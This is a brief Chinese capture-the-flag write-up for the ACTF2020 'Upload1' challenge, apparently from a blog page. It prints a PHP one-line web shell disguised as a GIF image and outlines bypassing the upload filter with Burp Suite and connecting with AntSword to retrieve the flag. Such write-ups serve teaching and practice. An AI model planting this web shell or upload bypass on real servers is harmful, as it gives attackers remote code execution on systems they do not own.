[ACTF2020 新生赛]Upload1

不拿flag不改名2024-09-12 13:20

1、点开题目链接,页面显示如下,上传test.jpg里面包含一句话木马

GIF89a? <script language="php">eval($_REQUEST1)</script>

2、使用bp抓包修改后缀,点击发送

3、不关浏览器的代理,在bp中将该包放行

4、用蚁剑连接

5、在根目录中找到flag

相关推荐
方白羽16 小时前
Android Gradle 缓存与文件目录深度解析
android·gradle·android studio
曲幽19 小时前
Termux里的二进制和脚本,到底怎么运行才不踩坑?Termux-service 保活妙招!
android·termux·nohup·services·wake-lock
plainGeekDev20 小时前
单例模式 → object 声明
android·java·kotlin
程序员陆业聪20 小时前
读者点单·03|Compose 与传统 View 混用的 12 个真实坑
android
程序员陆业聪21 小时前
读者点单·02|Android 启动优化实战:Trace 抓取→Application 编排→冷启动全流程拆解
android
Coffeeee21 小时前
帮你快速理解AI Agent之我想招个Android实习生
android·人工智能·agent
恋猫de小郭1 天前
苹果 AirPods 协议,Android 也可以使用完整版 AirPods 能力
android·前端·flutter
黄林晴1 天前
告别无效重建:Gradle 9.6.0 解决 CI 构建缓存失效痛点告别无效重建:Gradle 9.6.0 解决 CI 建筑缓存失效痛点
android·gradle
张风捷特烈1 天前
Flutter 类库大揭秘#01 | path_provider架构与设计
android·flutter
_阿南_1 天前
Android文件读写和分享总结
android
热门推荐
012026年6月AI大模型全景报告:GPT-5.6、Claude Opus 4.8、Gemini 3.5,中美AI三足鼎立谁主沉浮?022026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?03【AI】2026 年具身智能模型和世界模型总结042026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf05Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析06GitHub 镜像站点07【AI总结】2026年6月 主流国内外大模型总结08AI科技热点日报 | 2026年6月1日09飞书长连接_事件订阅(接收消息,审批任务状态变更)10AI科技热点日报 | 2026年6月22日